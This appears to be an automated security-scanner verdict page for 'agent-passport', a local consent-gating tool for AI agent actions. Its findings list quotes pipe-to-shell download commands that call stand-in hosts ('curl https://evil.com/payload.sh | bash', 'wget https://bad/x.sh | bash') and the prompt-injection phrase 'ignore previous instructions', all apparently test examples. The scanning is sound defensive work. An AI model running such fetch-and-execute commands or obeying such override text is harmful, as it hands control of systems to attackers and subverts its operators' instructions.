Caveat verdict
agent-passport
A consent-gating and permission-management tool for agent actions; all operations are local bash scripts that check mandates before allowing sensitive actions, which is exactly the stated security purpose.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (7)
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
README.md · code · curl https://evil.com/payload.sh | bash
Pipe to bash — executes piped content as shell commands
README.md · code · | bash
References sudo — requests elevated privileges
references/mandates.md · code · sudo
Prompt injection — tries to override agent instructions
scripts/test-v2.3.sh · prose · downgraded · ignore previous instructions
Pipe to sh — executes piped content as shell commands
scripts/test-v2.3.sh · prose · downgraded · | sh
Pipe-to-shell pattern (wget | sh)
scripts/test-v2.3.sh · prose · downgraded · wget https://bad/x.sh | bash
Popular HTTP library — network access
scripts/test-v2.3.sh · prose · downgraded · got
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
Requires 1 environment variable. Requires 6 system binaries.
Is this flag fair?
Thanks — recorded.